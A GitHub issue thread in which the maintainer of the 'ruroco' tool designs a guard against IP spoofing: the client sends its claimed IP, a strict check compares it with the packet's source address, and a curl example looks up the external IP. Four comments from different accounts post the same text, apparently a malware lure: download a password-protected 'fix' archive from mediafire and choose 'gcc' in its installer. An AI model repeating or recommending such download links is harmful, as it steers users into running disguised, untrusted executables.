### ISSUE TITLE
What to do if adversary controls network 

### ISSUE THREAD

**Issue by beac0n** [beac0n/ruroco#9]
adversary could spoof sender IP address with their own IP address.

- Use ipify.org or other tools on client and embed it in the payload. (should be enabled by default)
- validate the IP that the UDP packet sender has with  the one in the payload
- add "strict" flag (should be enabled by default) to disable that check in case tools like ipify don't work in the current network

potential sites to use for external api lookup:

- https://www.ipify.org/
- https://icanhazip.com/
- https://ifconfig.me/
- http://ip-api.com/json/
- https://whatismyip.akamai.com/ <= 2. option
- https://myip.wtf/json
- https://ipecho.net/plain
- https://checkip.amazonaws.com/ <= 1. option
- https://ident.me/
- https://myexternalip.com/raw

also add possibility to define external IP manually

EDIT:

- Instead of selecting a service to get the external IP, **only** give the user the ability to set the IP manually. If user wants to pick an external service, they can use the $(...) syntax:

```bash
ruroco-client send -c "<command>" -d 5 -a "<host>:<port>" -p "/path/to/private.pem" --strict false --ip $(curl -s https://checkip.amazonaws.com/)
```

- `--strict true` is the default, **if** `--ip` was provided
    -  if `--strict` is false, the the IP that the user send will be used as the value of env var `RUROCO_IP`
    - if `--strict` is true, the IP that the user send will be compared with the source IP that arrived at the server
        - if the IPs match, the command is executed
        - if the IPs **don't**, the command is not executed and an error is logged.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by beac0n** [comment]
implemented and will be available with next release
